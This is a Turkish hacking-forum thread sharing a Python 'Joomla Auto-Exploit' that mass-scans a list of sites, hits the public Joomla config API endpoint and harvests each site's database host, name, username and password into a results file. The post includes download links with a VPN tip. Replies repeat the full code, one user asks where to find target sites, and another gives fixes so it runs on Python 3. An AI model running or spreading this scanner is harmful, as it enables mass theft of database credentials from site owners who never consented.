# Joomla Auto-Exploit NEW #

P4$A

Anka Emektar
13 Tem 2021
1,486
2,804
23
";-alert(1)-//

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
 

ACE Veen

Uzman üye
4 Şub 2023
1,077
534
Belirsiz

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
elinize sağlık hocam
 

Suppressor

Request Uzmanı
16 Kas 2022
1,203
710
always, everywhere

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
Elinize sağlık hocam
 

mertarsln

Üye
31 Eki 2022
87
36
Dubai

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
Eline sağlık Hocam
 

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
Elinize sağlık
 

kabus002

Yeni üye
24 Mar 2023
6
1

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()
SİTELERİ NERDEN BULCAZ KRAL YARDİMCİ OLSAN O KONUDADA
 

Rayztw

Katılımcı Üye
17 Eyl 2021
254
101

hu0mmvg.png

Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:

Download Links:
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Note: Turn on vpn for anonfiles.
r1qu971.png

Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)

r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL

def jomprv(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
        asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
        if 'dbtype' in asw.content:
            hoset = re.findall('"host":"(.*?)"',asw.content)[0]
            debst = re.findall('"db":"(.*?)"',asw.content)[0]
            uset = re.findall('"user":"(.*?)"',asw.content)[0]
            paset = re.findall('"password":"(.*?)"',asw.content)[0]
            print ("Domain" + " : " + url)
            print (g + "HOST" + " : " + hoset)
            print (g + "DB" + " : " + debst)
            print (g + "User" + " : " + uset)
            print (g + "Pass" + " : " + paset)
            open('result.txt', 'a').write('\n!== Results Joomla  ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
        else:
            print(r+ 'BAD' + ' ' + url)
            #for res in regex:
    except:
        pass

print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()

Python:
print ("{}Cracked By P4$A | Site List -->\n").format(y)
şu kısmı verdiğim koddaki gibi düzeltirsen
hata çözülecektir
Python:
print ("{}Cracked By P4$A | Site List -->\n".format(y))
hata nedeni formatı parantez dışında tanımlaman
bi başka daha hata varmış
Python:
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
bu kısmıda
Python:
url = open(input(o+'List:~# '),'r').read().splitlines()
diye düzeltirsek tüm hatalar çözülecektir
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.